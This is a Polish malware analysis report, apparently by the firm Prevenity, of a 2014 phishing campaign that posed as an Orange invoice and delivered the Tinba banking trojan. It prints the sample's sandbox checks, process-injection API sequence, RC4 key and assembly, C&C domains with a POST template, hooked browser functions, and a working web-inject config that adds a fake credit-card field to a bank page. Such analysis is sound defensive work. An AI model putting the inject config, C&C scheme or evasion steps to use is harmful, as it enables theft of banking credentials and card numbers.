Faktura Orange z 11 lipca 2014 roku zawierająca złośliwe oprogramowanie ANALIZA

Wielkość: px

Rozpocząć pokaz od strony:

Download "Faktura Orange z 11 lipca 2014 roku zawierająca złośliwe oprogramowanie ANALIZA"

Sabina Piotrowska
8 lat temu
Przeglądów:

Faktura Orange z 11 lipca 2014 roku zawierająca złośliwe oprogramowanie ANALIZA 21 Lipiec, 2014 W dniu 11 lipca 2014 zarejestrowaliśmy kolejną kampanię polegającą na rozsyłaniu złośliwego

1 Faktura Orange z 11 lipca 2014 roku zawierająca złośliwe oprogramowanie ANALIZA 21 Lipiec, 2014 W dniu 11 lipca 2014 zarejestrowaliśmy kolejną kampanię polegającą na rozsyłaniu złośliwego oprogramowania nakierowanego na bankowość internetową. Tym raz atak skierowany jest na polskich użytkowników. Jak można zauważyć poniżej, treść wiadomości jest w języku polskim i dotyczy faktury z Telekomunikacji Polskiej za czerwiec Były też rozsyłane wiadomości o innej treści oraz zawierające nieznacznie zmodyfikowaną wersję złośliwego oprogramowania. Łatwo zauważyć (dla osób które co miesiąc otrzymują faktury z firmy Orange), że nie jest to typowa wiadomość z fakturą. Dla bardziej spostrzegawczych: Firma Orange do grudnia 2013 wykorzystywała adres e-faktura.tp@orange.com ale od stycznia 2014 już e-fakturaf@orange.com. Niemniej złośliwe oprogramowanie dołączone jest do wiadomości. Treść wiadomości i nazwa załącznika sugerują, że jest to dokument w formacie PDF. W rzeczywistości jest to plik wykonywalny o rozszerzeniu pif. File: DKT_Faktura_indywidualna_2014_07_11_R.pdf.pif Size: MD5: DA9330AA6D275BA28954B88ECF27DEDB Plik wykonywalny jest dodatkowo zabezpieczony, przez co ujawniana jest niewielka ilość ciągów znaków prawdziwego pliku wykonywalnego. Prevenity

Jak można zauważyć poniżej, treść wiadomości jest w języku polskim i dotyczy faktury z Telekomunikacji Polskiej za czerwiec 2014.

2 Po uruchomieniu kod programu pakującego sprawdza, czy przypadkiem nie jest uruchamiany pod systemem operacyjnym kontrolowanym przez oprogramowanie VMWare lub VBOX oraz czy nie jest analizowany przez inny system typu sandbox bazujący na bibliotece SBIEDLL.DLL (np. Sandboxie). Poniżej fragment pamięci malware. Złośliwe oprogramowanie za pomocą API CreateToolhelp32Snapshot, Process32First oraz Process32Next identyfikuje podejrzane procesy i malware kończy działanie. Zauważyliśmy ponadto, że złośliwe oprogramowanie nie działa prawidło na systemach operacyjnych Windows XP z SP1 oraz SP3 (nie wywołuje prawidłowo funkcji API RegOpenKey). Gdy wirtualne środowisko nie zostanie wykryte, malware tworzy nowy proces, kopiuje do przestrzeni adresowej odpakowany kod i wykonuje właściwy kod odpowiedzialny za infekcję stacji roboczej. Sekwencja wywołań API jest następująca (typowa dla złośliwego oprogramowania): GetModuleFileNameW, 0x1, hprocess:0x774 CreateProcessW, 0x1, lpapplicationname: ReadProcessMemory, 0x1, hprocess:0x774 WriteProcessMemory, 0x1, hprocess:0x774 GetThreadContext, 0x1 SetThreadContext, 0x1, lpcontext->eip:0x40487c ResumeThread, 0x1, hthread:0x770 Stary proces kończy działanie a nowy zaczyna od wywołania funkcji Sleep. Następnie pobierana jest zmienna %APPDATA% i w katalogu domowym użytkownika tworzony jest katalog AdobeChk a w nim plik chk.exe. Jest to kopia pliku pif..text:00401ee1 call dword ptr [ebx h] ; funkcja CreateDirectory -> AdobeChk.text:00401EE7 push 1.text:00401EE9 lea eax, [ebp-20ch].text:00401eef push eax ; chk.exe.text:00401ef0 lea eax, dword_4012b4[ebx].text:00401ef6 push eax ; DKT_Faktura_indywidualna_2014_07_11_R.pdf.pif.text:00401EF7 call dword ptr [ebx h] ; funkcja MoveFileExA Następnie tworzony jest klucz rejestru o nazwie AdobeChk. To zapewnia, że malware będzie uruchamiany przy ponownym logowaniu użytkownika. Prevenity

Złośliwe oprogramowanie za pomocą API CreateToolhelp32Snapshot, Process32First oraz Process32Next identyfikuje podejrzane procesy i malware kończy działanie.

Złośliwe oprogramowanie ma zaimplementowany algorytm RC4 (szyfr strumieniowy), który używany jest do szyfrowania/odszyfrowywania fragmentów konfiguracji oraz komunikacji z serwerem C&C.

3 Złośliwe oprogramowanie ma zaimplementowany algorytm RC4 (szyfr strumieniowy), który używany jest do szyfrowania/odszyfrowywania fragmentów konfiguracji oraz komunikacji z serwerem C&C. Poniżej fragment kodu odpowiedzialnego za szyfrowanie danych:.text:00401bf2 call eax ; funkcja RC4SetKey.text:00401BF4 mov esi, [ebp+8].text:00401bf7 lodsd.text:00401bf8 push eax ; długość danych do zaszyfrowania.text:00401bf9 push esi ; dane do zaszyfrowania.text:00401bfa lea eax, [ebp-100h].text:00401c00 push eax ; zainicjalizowany klucz.text:00401c01 lea eax, dword_401c64[ebx].text:00401c07 call eax ; funkcja RC4Crypt RC4 generuje strumień szyfrujący/odszyfrowujący za pomocą funkcji RC4SetKey. Jako parametr wejściowy podawany jest tajny klucz, który w przypadku analizowanego malware to: wer8c7ygbw485ghw. Cała zawartość funkcji RC4SetKey (Crypt\rc4.inc): RC4SetKey proc lpkeytable, lppass, npass : dword pushad mov edi, lpkeytable xor ecx, mov [edi + ecx], cl ;utworzenie tablicy liczb inc ecx cmp ecx, 256 ;do 256 elementów mov esi, lppass ;klucz tajny przeniesiony do ESI xor ebx, ebx xor ecx, ecx xor edx, mov al, [edi + ecx] add bl, [esi + edx] add bl, al mov ah, [edi + ebx] mov [edi + ecx], ah mov [edi + ebx], al inc ecx cmp ecx, 256 inc edx Prevenity

text:00401bf8 push eax ; długość danych do zaszyfrowania.text:00401bf9 push esi ; dane do zaszyfrowania.text:00401bfa lea eax, [ebp-100h].text:00401c00 push eax ; zainicjalizowany klucz.

4 cmp edx, npass xor edx, edx popad ret RC4SetKey endp Następnie wywoływana jest funkcja RC4Crypt. W celu zaszyfrowania wykonywana jest operacja XOR na tekście oryginalnym i strumieniu szyfrującym. Dla przykładu inicjalizująca wiadomość EHLO przesyłana przez malware do serwera po zaszyfrowany będzie miała postać: Poniżej funkcja RC4Crypt odtworzona z malware za pomocą debugger-a:.text:00401c64 push ebp.text:00401c65 mov ebp, esp.text:00401c67 pusha.text:00401c68 mov edi, [ebp+8].text:00401c6b mov esi, [ebp+0ch].text:00401c6e xor eax, eax.text:00401c70 xor ebx, ebx.text:00401c72 xor ecx, ecx.text:00401c74 xor edx, edx.text:00401c76 loc_401c76: ; CODE XREF:.text:00401C91j.text:00401C76 inc bl.text:00401c78 mov dl, [edi+ebx].text:00401c7b add al, dl.text:00401c7d mov cl, [edi+eax].text:00401c80 mov [edi+ebx], cl.text:00401c83 mov [edi+eax], dl.text:00401c86 add cl, dl.text:00401c88 mov cl, [edi+ecx].text:00401c8b xor [esi], cl ; Operacja XOR na tekście i strumieniu szyfrującym.text:00401c8d inc esi.text:00401c8e dec dword ptr [ebp+10h].text:00401c91 jnz short loc_401c76.text:00401c93 popa.text:00401c94 leave.text:00401c95 retn 0Ch Za pomocą samej instrukcji XOR zakodowane są również nazwy domenowe serwerów C&C. Malware próbuje łączyć się na hosty o nazwach: framesoutchk.ru IP: plsecdirect.ru IP: Prevenity

Dla przykładu inicjalizująca wiadomość EHLO przesyłana przez malware do serwera po zaszyfrowany będzie miała postać: Poniżej funkcja RC4Crypt odtworzona z malware za pomocą debugger-a:.

Poniżej fragment kodu odkodowującego nazwy domenowe: W chwili wykonywania analizy strona z którą złośliwe oprogramowanie komunikuje się nie była aktywna.

5 Poniżej fragment kodu odkodowującego nazwy domenowe: W chwili wykonywania analizy strona z którą złośliwe oprogramowanie komunikuje się nie była aktywna. Poniżej zawartość szablonu wiadomości POST: POST /re/ HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Content-Type: application/x-www-form-urlencoded Host: framesoutchk.ru lub plsecdirect.ru Content-Length: Connection: Close Cache-Control: no-cache Wysyłanie komunikatu EHLO zwracało błąd 403. Niemniej na podstawie analizy można stwierdzić, że malware, który był rozsyłany nosi nazwę Tiny Banker (nazywany również Tinba). Jest to złośliwe oprogramowanie, które używane jest do wyłudzania numerów kart kredytowych czy danych do logowania w aplikacjach www jak bankowość internetowa. Na początku lipca 2014 kod źródłowy wersji 1.0 wyciekł do sieci Internet. Poniżej zawartość katalogu z kodem źródłowym: Prevenity

1; Trident/5.0) Content-Type: application/x-www-form-urlencoded Host: framesoutchk.ru lub plsecdirect.

6 Jest to wersja z 2012 roku ale część kodu nie została zmieniona. Na podstawie analizowanej wersji pliku DKT_Faktura_indywidualna_2014_07_11_R.pdf.pif można stwierdzić, że malware infekuje 4 przeglądarki internetowe: iexplore.exe firefox.exe maxthon.exe chrome.exe Przechwytywane są funkcje (metodą inline hooking) dwóch bibliotek: wininet oraz nspr4. Są to następujące funkcje: HttpQueryInfoA InternetCloseHandle HttpSendRequestA HttpSendRequestW InternetQueryDataAvailable InternetReadFile InternetReadFileExA HttpSendRequestExW InternetWriteFile HttpEndRequest PR_Write PR_Read PR_Close Prevenity

exe Przechwytywane są funkcje (metodą inline hooking) dwóch bibliotek: wininet oraz nspr4.

7 Tinba pobiera konfigurację z serwera i zapisuje ją w zaszyfrowanych RC4 plikach dat. Poniżej lista wszystkich plików, które może utworzyć malware korzystając ze zmiennej %APPDATA%: bck.dat, ret.exe, cot.dat, cof.dat. Zawartość pliku konfiguracyjnego przypomina budową konfigurację złośliwego oprogramowania ZEUS/ZBOT. Intruz może manipulować zawartością wyświetlanej użytkownikowi strony. Poniżej działający przykład, który wstrzykuje odpowiednio przygotowany kod. set_url GP data_before <input type="submit" value="submit"> data_end data_inject <script type="text/javascript">alert("uwaga prosimy o podanie numeru karty kredytowej");</script> <form name="myform"> Numer karty kredytowej:<input type="text" name="ccnumber"> </form> data_end data_after data_end Źródła: [1] [2] TrendMicro Dokument: W32.Tinba (Tinybanker) The Turkish Incident. Prevenity

Poniżej działający przykład, który wstrzykuje odpowiednio przygotowany kod. set_url http://prevenitybank.

Podobne dokumenty

Analiza malware Remote Administration Tool (RAT) DarkComet BeSTi@

Analiza malware Remote Administration Tool (RAT) DarkComet BeSTi@ 24 marzec, 2014 Wstęp Tydzień temu do wielu skrzynek pocztowych w Polsce trafił email z linkiem do pliku podszywającego się pod nową aktualizację